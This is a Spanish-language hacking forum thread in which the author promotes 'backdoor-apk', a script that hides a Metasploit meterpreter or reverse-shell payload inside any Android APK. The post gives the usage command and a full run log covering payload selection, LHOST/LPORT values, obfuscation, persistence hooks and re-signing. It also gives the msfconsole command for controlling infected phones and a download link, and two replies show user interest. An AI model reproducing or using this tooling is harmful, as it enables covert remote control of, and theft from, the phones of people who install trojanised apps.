comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Backdoor-APK - Script para agregar backdoors a las APKs

  • 2 Respuestas
  • 2943 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5388
  • Actividad:
    36.67%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« en: Diciembre 24, 2016, 12:16:48 am »

Bakcdoor-APK es un script que simplifica el proceso de agregar un backdoor a cualquier APK para Android. Para utilizar este script, es necesario que los usuarios tengan conocimientos de Linux, Bash, Metasploit, Apktool, el SDK de android, smali, etc.
La idea de este script es mantenerlo lejos del alcance de gente mal intencionada. Es solo para propositos educativos.

Uso:
Código: Bash
  1. ./backdoor-apk.sh BaiduBrowser.apk

Código: Bash
  1.           ________
  2.          / ______ \
  3.          || _  _ ||
  4.          ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
  5.          |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
  6.          || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
  7.          ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
  8.          |||_||_|||         AAA  AAA  PPP       KKK  KKK
  9.          ||______||         AAA  AAA  PPP       KKK  KKK
  10.         /__________\
  11. ________|__________|__________________________________________
  12.        /____________\
  13.        |____________|            Dana James Traversie
  14.  
  15. [*] Running backdoor-apk.sh v0.1.7 on Wed Nov 30 22:30:34 EST 2016
  16. [+] Android payload options:
  17. 1) meterpreter/reverse_http   4) shell/reverse_http
  18. 2) meterpreter/reverse_https  5) shell/reverse_https
  19. 3) meterpreter/reverse_tcp    6) shell/reverse_tcp
  20. [?] Please select an Android payload option: 2
  21. [?] Please enter an LHOST value: 10.6.9.31
  22. [?] Please enter an LPORT value: 443
  23. [+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
  24. [*] Generating RAT APK file...done.
  25. [*] Decompiling RAT APK file...done.
  26. [*] Decompiling original APK file...done.
  27. [*] Merging permissions of original and payload projects...done.
  28. [*] Running proguard on RAT APK file...done.
  29. [*] Decompiling obfuscated RAT APK file...done.
  30. [*] Creating new directories in original project for RAT smali files...done.
  31. [*] Copying RAT smali files to new directories in original project...done.
  32. [*] Fixing RAT smali files...done.
  33. [*] Obfuscating const-string values in RAT smali files...done.
  34. [*] Locating smali file to hook in original project...done.
  35. [*] Adding hook in original smali file...done.
  36. [*] Adding persistence hook in original project...done.
  37. [*] Recompiling original project with backdoor...done.
  38. [*] Generating RSA key for signing...done.
  39. [*] Signing recompiled APK...done.
  40. [*] Verifying signed artifacts...done.
  41. [*] Aligning recompiled APK...done.

El APK recompilado funcionará en el directorio original de la APK que infectamos. Ahora solo es necesario instalar el APK en alguna terminal de Android y correrla.

Ahora podremos conectarnos por meterpreter con el script generado:

msfconsole -r backdoor-apk.rc

Descarga: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Espero que les sea de utilidad.
ANTRAX


Desconectado Kirah_Fawkes

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
  • Skype: no
« Respuesta #1 en: Diciembre 28, 2016, 06:09:58 am »
Wow, se ve muy interesante! Hacerlo todo a mano lleva un tiempo muy valioso y después de tres o cuatro veces se hace un tanto tedioso, le echaré un vistazo, gracias!! :)

Desconectado R3v0lve

  • *
  • Underc0der
  • Mensajes: 77
  • Actividad:
    3.33%
  • Reputación 3
  • No se sale adelante celebrando éxitos sino superan
    • Ver Perfil
  • Skype: антисоціальна
  • Twitter: антисоціальна
« Respuesta #2 en: Enero 12, 2017, 12:44:20 am »
Pregunta!!, el backdoor  apk ,descompila el apk oh lo hace con apktool y el source del apk lo une y genera el backdoor ahora esto lo hace con, cualquier apk es decir firmas y certificadas,?


Ми повинні мати віру в себе. У цьому і полягає секрет. Навіть коли я був у дитячому будинку і ходили по вулицях у пошуках їжі, щоб жити, навіть тоді, я вважав найбільшим актором в світі. Без абсолютної впевненості, один приречена на провал.

 

¿Te gustó el post? COMPARTILO!



Eternal - Un escáner para Eternal Blue

Iniciado por puntoCL

Respuestas: 2
Vistas: 1869
Último mensaje Julio 23, 2017, 10:37:05 pm
por puntoCL
[Phishing] Página de phishing para Twitter

Iniciado por bernatixer

Respuestas: 8
Vistas: 4429
Último mensaje Enero 07, 2016, 10:23:35 am
por ANTRAX
Sniffer para windows "RawCap"

Iniciado por s747ik

Respuestas: 1
Vistas: 2059
Último mensaje Junio 12, 2011, 04:08:03 pm
por staRgan
Paso a paso para ser un verdadero < HACKER > lo mejor que hay

Iniciado por smown

Respuestas: 5
Vistas: 1367
Último mensaje Agosto 17, 2018, 09:20:02 am
por ANTRAX
Un Redirect en Facebook para hacer Phishing a Facebook

Iniciado por Stiuvert

Respuestas: 4
Vistas: 4177
Último mensaje Enero 09, 2014, 11:46:26 pm
por Snifer